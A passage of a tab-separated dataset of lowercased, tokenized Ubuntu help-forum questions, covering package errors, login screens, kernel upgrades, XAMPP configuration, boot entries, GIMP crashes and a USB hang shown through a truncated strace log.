1:0.9.11.2+14.04.20140714-0ubuntu1 ) over ( 1:0.9.11.1+14.04.20140701-0ubuntu1 ) ... preparing to unpack ... /compiz-plugins-default_1 % 3a0.9.11.2+14.04.20140714-0ubuntu1_amd64.deb ... unpacking compiz-plugins-default ( 1:0.9.11.2+14.04.20140714-0ubuntu1 ) over ( 1:0.9.11.1+14.04.20140701-0ubuntu1 ) ... preparing to unpack ... /libdecoration0_1 % 3a0.9.11.2+14.04.20140714-0ubuntu1_amd64.deb ... unpacking libdecoration0 ( 1:0.9.11.2+14.04.20140714-0ubuntu1 ) over ( 1:0.9.11.1+14.04.20140701-0ubuntu1 ) ... preparing to unpack ... /gnome-settings-daemon-schemas_3.8.6.1-0ubuntu11.2_all.deb ... unpacking gnome-settings-daemon-schemas ( 3.8.6.1-0ubuntu11.2 ) ... dpkg : error processing archive /var/cache/apt/archives/gnome-settings-daemon-schemas_3.8.6.1-0ubuntu11.2_all.deb ( -- unpack ) : trying to overwrite '/usr/share/gconf/gsettings/gnome-settings-daemon.convert ' , which is also in package gnome-settings-daemon 3.10.2-0ubuntu1~saucy1 preparing to unpack ... /compiz-core_1 % 3a0.9.11.2+14.04.20140714-0ubuntu1_amd64.deb ... unpacking compiz-core ( 1:0.9.11.2+14.04.20140714-0ubuntu1 ) over ( 1:0.9.11.1+14.04.20140701-0ubuntu1 ) ... processing triggers for gconf2 ( 3.2.6-0ubuntu2 ) ... processing triggers for libglib2.0-0 : i386 ( 2.40.0-2 ) ... processing triggers for libglib2.0-0 : amd64 ( 2.40.0-2 ) ... processing triggers for man-db ( 2.6.5-2 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for bamfdaemon ( 0.5.1+13.10.20131011-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ( 3.54ubuntu1 ) ... errors were encountered while processing : /var/cache/apt/archives/gnome-settings-daemon-schemas_3.8.6.1-0ubuntu11.2_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) mario @ mario-aspire-5536 : ~ $ sudo apt-get remove linux-generic reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : compiz-gnome : depends : gnome-settings-daemon-schemas ( > = 3.4.2-0ubuntu9 ) but it is not going to be installed unity-settings-daemon : depends : gnome-settings-daemon-schemas ( > = 3.8 ) but it is not going to be installed depends : gnome-settings-daemon-schemas ( < 3.10 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . mario @ mario-aspire-5536 : ~ $ i still need some help ...
506949	how do i use lightdm for login instead of light-locker ?	i installed xubuntu on my laptop and recently removed nearly all of the xfce4 packages in favor of a kde desktop . however , light-locker is still used for the login screen . how can i remove it and enable the standard lightdm login screen of kde ?
506954	hi . trying to move some files , but nautilus progress bar wo n't come up . ( trusty 14.04 )	i have been having some trouble with an external hard drive lately , so i have been trying to move as many files off of it before it finally bites the dust . so i 've been able to track progress pretty well so far , but i just discovered that a made an oops with moving files from a folder and now i have to start all over again . i was able to see the progress bar before , but now , all of a sudden , it wo n't show up any more . can anybody figure out just what went wrong here ? i 'll keep trying to figure out what 's wrong , till then , but any help is appreciated .
506956	how can i install 3.16 kernel on ubuntu 14.04	sudo apt-get update & & sudo apt-get dist-upgrade do not show the newest kernel . how can i install 3.16 kernel on 14.04 ?
506959	after xampp install php files downloading when called	i recently installed xampp and when ever my html file calls a php script firefox downloads the script instead of running it . i have the php5 module installed and this is what my apache hhtpd.conf file looks like : alias /bitnami/ `` /opt/lampp/apache2/htdocs/ '' alias /bitnami `` /opt/lampp/apache2/htdocs '' loadmodule php5_module modules/libphp5.so < ifmodule mod_mime.c > addtype application/x-httpd-php .php addtype application/x-httpd-php .phtml addtype application/x-httpd-php .php3 addtype application/x-httpd-php .php4 addtype application/x-httpd-php .php4 addtype application/x-httpd-php .php5 addtype application/x-httpd-php .html addtype application/x-httpd-php-source .phps < /ifmodule > < filesmatch \.php $ > sethandler application/x-httpd-php < /filesmatch > < directory `` /opt/lampp/apache2/htdocs '' > options indexes followsymlinks allowoverride all order allow , deny allow from all < /directory > first time trying to set up apache not really sure what is going on enter code here
506961	after removing ubuntu , i still have traces of it in my boot order	for a while now , i 've been trying to dual boot kali linux and windows 8 and failing . i think a reason for that might be is because i still have traces of ubuntu ( i had it installed before , formatted its parition , booted a live cd and used boot repair so that it boots automatically into windows and grub is removed ) even after doing that , i still see traces of ubuntu in my boot order it literally says internal cd dvd/rom drive ubuntu ubuntu hard disk there are two entries of ubuntu even though i do n't have it anywhere , if i boot into them i get presetened with grub > command line how do i remove these two entries ?
506963	command line upgrade after current version no longer supported	i was trying to install some php5 modules on my virtual private server and they were n't found . the server runs ubuntu 13.04 . so i ran sudo apt-get update and noticed that many of the sites were not found . it looks like my version is not supported . so i looked into how to upgrade to a new version of ubuntu from the command line since i can only administer the server through ssh . all the stuff i found said that i needed either do-release-upgrade or update-manager , neither of which was on my system . so i searched for both with aptitude and only update-manager was found , so i thought i would give it a try . of course , i could n't install it because the packages were not found , because my release is no longer supported . does this mean there is no way to upgrade the server remotely ? will i have to open a new vps account just to get a fresh installation of ubuntu ?
506965	ubuntu server crash after build.sh run	i have a build server with ubuntu . and in my source code there is typical build.sh to invoke the make file in order to compile the source code . but suddenly the server crashed and i found the below log in syslog : aug 4 13:47:28 vdbs1130 kernel : [ 2689989.302589 ] build.sh invoked oom-killer : gfp_mask=0xd0 , order=1 , oom_adj=0 , oom_score_adj=0 aug 4 13:47:28 vdbs1130 kernel : [ 2689989.302593 ] build.sh cpuset=/ mems_allowed=0 aug 4 13:47:28 vdbs1130 kernel : [ 2689989.302596 ] pid : 8978 , comm : build.sh not tainted 3.2.0-60-generic-pae # 91-ubuntu aug 4 13:47:28 vdbs1130 kernel : [ 2689989.302598 ] call trace : can anyone tell me what does it mean ? can my local build.sh crash the kernel ?
506966	gimp crashing on start	i have ubuntu 14.04 on what used to be a windows 7 laptop . i have no partition . windows is absolutely gone . when i first got ubuntu , i was thrilled to hear that i can get my beloved gimp . however , every time i would try to start it , it would load for a few seconds and give me that blue splatter saying it crashed , asking me if i want to relaunch or send an error report . it would always do that . i just left it alone . i really need to use gimp right now because it is my best choice for what i have to edit , and it still does not work . earlier today , it gave me that blue splat a couple times and relaunch obviously does not work . my cursor just loads for 10-20 seconds and nothing happens . now , i am not even getting an error . the cursor just loads for 10-20 seconds and stops . i uninstalled gimp and reinstalled it twice today , and no more error message . it just loads and stops . i have no idea what to do . i need gimp and i do not even know what the problem is . i only have this computer . i am really hoping someone can help me . if i were still getting that error report , i could tell you the details , but i am not getting anything anymore but a few seconds of loading . also , if you are going to walk me through the steps and know how to fix this , please dumb it down as much as possible because i am not very familiar with ubuntu like i am with windows . ubuntu is just upsetting me so much lately with all this trouble it gives me . edit : well , excuse me for not giving you enough details , but i did state that i have no idea why it is doing this and i was not getting an error message . when i type `` gimp '' into terminal , i get : '' segmentation fault ( core dumped ) '' i have reinstalled gimp many times . i have tried from both the website and the software center . the current , broken version on my computer is directly from the software center . and before someone asks , i purged before reinstalling each time . edit : i ran a memtest , and it passed with no errors . edit : it opened in guest ... can someone please explain that ?
506969	how to make everything run as root in ubuntu ?	i have setup a virtual machine for compiling software for linux which i develop on windows . i setup to automount a windows folder , run compilation scripts and then just shutdown . the machine is n't even connected to a network . i have read a few question to answer it myself but the only thing i can make happen is that i do not have to type in a password and auto login my user in ubuntu . but what i want to do is : i want to execute a command in the terminal . i want it to execute with root privilidges , every command and always under any circumstances . i do not want to type `` sudo '' or `` su '' every time i go to the console to compile my programs ( some scripts require root privilidges , some not , you do n't know until you run it and a bunch of errors appear which makes it really frustrating ) . so how do i do this ? optional : how can i make everything in the default ubuntu gui also run as admin ? eg gedit when double clicking on a file ? proclaimer i looked for other answers about this topic but they do not answer the question . every answer denies an correct answer on a `` it 's not secure '' basis ( even though users state most of the times they are aware of the security risks ) ... and i do not care about a non-networked os 's security . it 's just a matter of loading a previous snapshot of the compilation vm if anything breaks .
506971	how to fix error message	i keep getting an error message that all the packages for ttf-mscorefonts-installer failed to download . so , play on linux does not work properly . for instance , i installed itunes and spotify but neither one will open or itunes wont let me sign in.i tried installing the installer from the software center but i get the error message . i tried re-installing from the terminal but it says the latest version of playonlinux is installed . anybody know how i can fix this ?
506972	nautilus connect to server ca n't type in gui	when i have nautilus open and i select file- > connect to server ... the window that opens up wont let me type in any of the fields . i have no idea why it would do this . it has worked previously , but somewhere along the line it started doing this . i 'm not quite sure what changed that made this happen . it occurs with any of the `` types '' that are selected from the combo box as well . any ideas on what i can do to troubleshoot ?
506981	my sticky notes can not change color and backgroud color	ubuntu 14.04 . i use gnome-flashback ( metacity ) desktop . i have added sticky notes to the panel but all the color settings have no effect . the text-font setting also has no effect .
506983	software updater broken ?	that 's the result i got when i tried to update the system . by working with the software and updates settings , fetching some keys from the key server , and working with apt-get in the terminal , i managed to get the rest of the update to go fine , but i ca n't get the software updater to do more than open a blank window . everything else works fine : ubuntu software center , settings , apt-get , aptitude ; but even when i uninstalled and re-installed software updater , i still could n't get it to show any progress beyond a blank window . what should i look into to make software updater work again ?
506984	remove windows partition permanently	i used to have windows7 as the only os in my laptop . a few months back i installed ubuntu 14.04 alongside windows and now getting used to it , i love it and want to make it my primary os and permanently delete windows for good . how can i delete windows without getting any problems with ubuntu and make my whole hard disk available to ubuntu ? thank you .
506985	c # - opening the terminal process and pass commands ?	is there a way i can start a terminal process in c # with commands executed after it starts ?
506989	update manager message “new hardware support is available”	if i click on install new hardware is available my /home /var data is safe ? or i need to take backup first ?
506990	problems after updating 12.04	during software update it went to a bank screen and i rebooted it . after that the system would n't boot . grub showed and i chose ubuntu but it just went to a black screen . i removed the amd proprietary drivers trough a bootable pendrive and now i can get to the login screen . but after login in unity doesnt open and it takes a long time for it to recognize my mouse and keyboard . i cant open almost anything by terminal because it says libgl.so.1 is missing . is there a solution or is my installation completely messed up ? im starting to think it would be easier to do a clean install ...
506992	lsusb failing when i plug in my build light	just ran into a very strange problem using ubuntu 14.04 . i am running a build light server and the now when i plug in the build light , it flashes every 10 seconds and my program ca n't access it ( hangs when using libusb ) . i tried running lsusb but got no output at all and ca n't even terminate using control+c . i 've included some debug output here but let me know if there 's anything else i can provide that can help . sudo strace libusb execve ( `` /usr/bin/lsusb '' , [ `` lsusb '' ] , [ /* 19 vars */ ] ) = 0 brk ( 0 ) = 0xa7a000 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) mmap ( null , 8192 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f18169b6000 access ( `` /etc/ld.so.preload '' , r_ok ) = -1 enoent ( no such file or directory ) open ( `` /etc/ld.so.cache '' , o_rdonly|o_cloexec ) = 3 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=108659 , ... } ) = 0 mmap ( null , 108659 , prot_read , map_private , 3 , 0 ) = 0x7f181699b000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libusb-1.0.so.0 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0p : \0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=92864 , ... } ) = 0 mmap ( null , 2188384 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f181657f000 mprotect ( 0x7f1816594000 , 2097152 , prot_none ) = 0 mmap ( 0x7f1816794000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x15000 ) = 0x7f1816794000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libz.so.1 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\0\36\0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=100728 , ... } ) = 0 mmap ( null , 2195784 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f1816366000 mprotect ( 0x7f181637e000 , 2093056 , prot_none ) = 0 mmap ( 0x7f181657d000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x17000 ) = 0x7f181657d000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libc.so.6 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\320\37\2\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0755 , st_size=1845024 , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f181699a000 mmap ( null , 3953344 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f1815fa0000 mprotect ( 0x7f181615c000 , 2093056 , prot_none ) = 0 mmap ( 0x7f181635b000 , 24576 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x1bb000 ) = 0x7f181635b000 mmap ( 0x7f1816361000 , 17088 , prot_read|prot_write , map_private|map_fixed|map_anonymous , -1 , 0 ) = 0x7f1816361000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libudev.so.1 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\0200\0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=67600 , ... } ) = 0 mmap ( null , 2164816 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f1815d8f000 mprotect ( 0x7f1815d9f000 , 2093056 , prot_none ) = 0 mmap ( 0x7f1815f9e000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0xf000 ) = 0x7f1815f9e000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libpthread.so.0 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0po\0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0755 , st_size=141574 , ... } ) = 0 mmap ( null , 2217264 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f1815b71000 mprotect ( 0x7f1815b8a000 , 2093056 , prot_none ) = 0 mmap ( 0x7f1815d89000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x18000 ) = 0x7f1815d89000 mmap ( 0x7f1815d8b000 , 13616 , prot_read|prot_write , map_private|map_fixed|map_anonymous , -1 , 0 ) = 0x7f1815d8b000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libcgmanager.so.0 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\0206\0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=108480 , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f1816999000 mmap ( null , 2203688 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f1815956000 mprotect ( 0x7f181596f000 , 2093056 , prot_none ) = 0 mmap ( 0x7f1815b6e000 , 12288 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x18000 ) = 0x7f1815b6e000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libnih.so.1 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0`g\0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=96280 , ... } ) = 0 mmap ( null , 2191776 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f181573e000 mprotect ( 0x7f1815755000 , 2093056 , prot_none ) = 0 mmap ( 0x7f1815954000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x16000 ) = 0x7f1815954000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libnih-dbus.so.1 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\340 , \0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=38920 , ... } ) = 0 mmap ( null , 2134040 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f1815534000 mprotect ( 0x7f181553c000 , 2097152 , prot_none ) = 0 mmap ( 0x7f181573c000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x8000 ) = 0x7f181573c000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libdbus-1.so.3 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0 @ h\0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=281552 , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f1816998000 mmap ( null , 2377408 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f18152ef000 mprotect ( 0x7f1815333000 , 2093056 , prot_none ) = 0 mmap ( 0x7f1815532000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x43000 ) = 0x7f1815532000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/librt.so.1 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0p # \0\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=31792 , ... } ) = 0 mmap ( null , 2129016 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7f18150e7000 mprotect ( 0x7f18150ee000 , 2093056 , prot_none ) = 0 mmap ( 0x7f18152ed000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x6000 ) = 0x7f18152ed000 close ( 3 ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f1816997000 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f1816996000 mmap ( null , 8192 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f1816994000 arch_prctl ( arch_set_fs , 0x7f1816994740 ) = 0 mprotect ( 0x7f181635b000 , 16384 , prot_read ) = 0 mprotect ( 0x7f1815d89000 , 4096 , prot_read ) = 0 mprotect ( 0x7f18152ed000 , 4096 , prot_read ) = 0 mprotect ( 0x7f1815532000 , 4096 , prot_read ) = 0 mprotect ( 0x7f1815954000 , 4096 , prot_read ) = 0 mprotect ( 0x7f181573c000 , 4096 , prot_read ) = 0 mprotect ( 0x7f1815b6e000 , 8192 , prot_read ) = 0 mprotect ( 0x7f1815f9e000 , 4096 , prot_read ) = 0 mprotect ( 0x7f181657d000 , 4096 , prot_read ) = 0 mprotect ( 0x7f1816794000 , 4096 , prot_read ) = 0 mprotect ( 0x617000 , 8192 , prot_read ) = 0 mprotect ( 0x7f18169b8000 , 4096 , prot_read ) = 0 munmap ( 0x7f181699b000 , 108659 ) = 0 set_tid_address ( 0x7f1816994a10 ) = 28126 set_robust_list ( 0x7f1816994a20 , 24 ) = 0 futex ( 0x7fff4e3576d0 , futex_wait_bitset_private|futex_clock_realtime , 1 , null , 7f1816994740 ) = -1 eagain ( resource temporarily unavailable ) rt_sigaction ( sigrtmin , { 0x7f1815b779f0 , [ ] , sa_restorer|sa_siginfo , 0x7f1815b81340 } , null , 8 ) = 0 rt_sigaction ( sigrt_1 , { 0x7f1815b77a80 , [ ] , sa_restorer|sa_restart|sa_siginfo , 0x7f1815b81340 } , null , 8 ) = 0 rt_sigprocmask ( sig_unblock , [ rtmin rt_1 ] , null , 8 ) = 0 getrlimit ( rlimit_stack , { rlim_cur=8192*1024 , rlim_max=rlim64_infinity } ) = 0 brk ( 0 ) = 0xa7a000 brk ( 0xa9b000 ) = 0xa9b000 open ( `` /usr/lib/locale/locale-archive '' , o_rdonly|o_cloexec ) = 3 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=7216688 , ... } ) = 0 mmap ( null , 7216688 , prot_read , map_private , 3 , 0 ) = 0x7f1814a05000 close ( 3 ) = 0 open ( `` /var/lib/usbutils/usb.ids '' , o_rdonly ) = 3 lseek ( 3 , 0 , seek_cur ) = 0 read ( 3 , `` # \n # \tlist of usb id's\n # \n # \tmaintai '' ... , 8192 ) = 8192 read ( 3 , `` 1811 psc 720\n\t1812 officejet p '' ... , 16384 ) = 16384 read ( 3 , `` s 802.11n wireless adapter\n\t0300 '' ... , 16384 ) = 16384 read ( 3 , `` o\n0429 cirrus logic\n042a erics '' ... , 16384 ) = 16384 brk ( 0xabc000 ) = 0xabc000 read ( 3 , `` ed pocket pc 2003\n\t0447 windows '' ... , 16384 ) = 16384 read ( 3 , `` . computer corp.\n\t0100 keyboard '' ... , 16384 ) = 16384 read ( 3 , `` 0 scanner\n\t1702 mp410 composite '' ... , 16384 ) = 16384 read ( 3 , `` stylus photo rx640/rx650 ] \n\t081d `` ... , 16384 ) = 16384 read ( 3 , `` \n\t1003 mp3 player and recorder\n '' ... , 16384 ) = 16384 brk ( 0xadd000 ) = 0xadd000 read ( 3 , `` 7d1102 n150/surf micro wireless `` ... , 16384 ) = 16384 read ( 3 , `` rtner\n\t0010 graphire\n\t0011 gra '' ... , 16384 ) = 16384 read ( 3 , `` ] \n\t00db fotoshow zip 250 driver '' ... , 16384 ) = 16384 read ( 3 , `` press card\n\t0400 ufdc\n\t0401 uf '' ... , 16384 ) = 16384 brk ( 0xafe000 ) = 0xafe000 read ( 3 , `` evice\n\t2528 storage device ( 8gb '' ... , 16384 ) = 16384 read ( 3 , `` sil isl3886 ] \n\tee13 smc2862w-g v '' ... , 16384 ) = 16384 read ( 3 , `` voice recorder & camera w-10\n\t02 '' ... , 16384 ) = 16384 read ( 3 , `` hpna home phoneline rj-1\n084d `` ... , 16384 ) = 16384 read ( 3 , `` c\n\t651b traveldrive 2c\n\t651c t '' ... , 16384 ) = 16384 brk ( 0xb1f000 ) = 0xb1f000 read ( 3 , `` istbands printer\n\t930a printer\n '' ... , 16384 ) = 16384 read ( 3 , `` a33 pocketpc sync\n\t0a34 pocket '' ... , 16384 ) = 16384 read ( 3 , `` /485 ( port 3 ) \n\t2433 seaport+4 ( `` ... , 16384 ) = 16384 read ( 3 , `` ter\n\t5501 mass storage device\n\t '' ... , 16384 ) = 16384 brk ( 0xb40000 ) = 0xb40000 read ( 3 , `` int electronic corp.\n0fb0 haurt '' ... , 16384 ) = 16384 read ( 3 , `` \t1450 uport 1450 4-port rs-232/ '' ... , 16384 ) = 16384 read ( 3 , `` dtv usb-ter/hama usb dvb-t devic '' ... , 16384 ) = 16384 read ( 3 , `` 001 edgeport/4 serial port\n\t000 '' ... , 16384 ) = 16384 read ( 3 , `` 00 - dvb-t usb warm\n1861 tech t '' ... , 16384 ) = 16384 brk ( 0xb61000 ) = 0xb61000 read ( 3 , `` controller\n\t000e genius kb-120 '' ... , 16384 ) = 16384 read ( 3 , `` t bda device\n\t0225 remote kit i '' ... , 16384 ) = 16384 read ( 3 , `` gital microscope ( sn9c201 + mi13 '' ... , 16384 ) = 16384 read ( 3 , `` 43 slow blink on time\n\t044 slo '' ... , 16384 ) = 16384 brk ( 0xb82000 ) = 0xb82000 read ( 3 , `` u sar\nl 0005 czech\nl 0006 dani '' ... , 16384 ) = 3236 read ( 3 , `` '' , 13148 ) = 0 read ( 3 , `` '' , 16384 ) = 0 close ( 3 ) = 0 openat ( at_fdcwd , `` /dev/bus/usb '' , o_rdonly|o_nonblock|o_directory|o_cloexec ) = 3 getdents ( 3 , /* 4 entries */ , 32768 ) = 96 close ( 3 ) = 0 uname ( { sys= '' linux '' , node= '' johnsmac '' , ... } ) = 0 uname ( { sys= '' linux '' , node= '' johnsmac '' , ... } ) = 0 uname ( { sys= '' linux '' , node= '' johnsmac '' , ... } ) = 0 uname ( { sys= '' linux '' , node= '' johnsmac '' , ... } ) = 0 stat ( `` /sys/bus/usb/devices '' , { st_mode=s_ifdir|0755 , st_size=0 , ... } ) = 0 open ( `` /etc/udev/udev.conf '' , o_rdonly|o_cloexec ) = 3 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=148 , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f18169b5000 read ( 3 , `` # see udev ( 7 ) for details\n # \n # ud '' ... , 4096 ) = 148 read ( 3 , `` '' , 4096 ) = 0 close ( 3 ) = 0 munmap ( 0x7f18169b5000 , 4096 ) = 0 socket ( pf_netlink , sock_raw|sock_cloexec|sock_nonblock , 15 ) = 3 setsockopt ( 3 , sol_socket , so_attach_filter , `` \10\0\0\0\0\0\0\0\200d5n\377\177\0\0 '' , 16 ) = 0 bind ( 3 , { sa_family=af_netlink , pid=0 , groups=00000002 } , 12 ) = 0 getsockname ( 3 , { sa_family=af_netlink , pid=28126 , groups=00000002 } , [ 12 ] ) = 0 setsockopt ( 3 , sol_socket , so_passcred , [ 1 ] , 4 ) = 0 fcntl ( 3 , f_getfl ) = 0x802 ( flags o_rdwr|o_nonblock ) fcntl ( 3 , f_setfl , o_rdwr|o_nonblock ) = 0 pipe ( [ 4 , 5 ] ) = 0 fcntl ( 5 , f_getfl ) = 0x1 ( flags o_wronly ) fcntl ( 5 , f_setfl , o_wronly|o_nonblock ) = 0 mmap ( null , 8392704 , prot_read|prot_write , map_private|map_anonymous|map_stack , -1 , 0 ) = 0x7f1814204000 mprotect ( 0x7f1814204000 , 4096 , prot_none ) = 0 clone ( child_stack=0x7f1814a03fb0 , flags=clone_vm|clone_fs|clone_files|clone_sighand|clone_thread|clone_sysvsem|clone_settls|clone_parent_settid|clone_child_cleartid , parent_tidptr=0x7f1814a049d0 , tls=0x7f1814a04700 , child_tidptr=0x7f1814a049d0 ) = 28127 stat ( `` /sys/subsystem '' , 0x7fff4e357480 ) = -1 enoent ( no such file or directory ) openat ( at_fdcwd , `` /sys/bus '' , o_rdonly|o_nonblock|o_directory|o_cloexec ) = 6 getdents ( 6 , /* 29 entries */ , 32768 ) = 800 open ( `` /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache '' , o_rdonly ) = 7 fstat ( 7 , { st_mode=s_ifreg|0644 , st_size=26258 , ... } ) = 0 mmap ( null , 26258 , prot_read , map_shared , 7 , 0 ) = 0x7f18169af000 close ( 7 ) = 0 futex ( 0x7f1816360a70 , futex_wake_private , 2147483647 ) = 0 openat ( at_fdcwd , `` /sys/bus/usb/devices '' , o_rdonly|o_nonblock|o_directory|o_cloexec ) = 7 getdents ( 7 , /* 21 entries */ , 32768 ) = 608 readlink ( `` /sys/bus/usb/devices/1-1 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 49 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-1/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-8 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 49 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-8/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/2-4 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 49 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb2/2-4/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-12 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 50 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-12/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/usb1 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 45 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/usb2 '' , `` 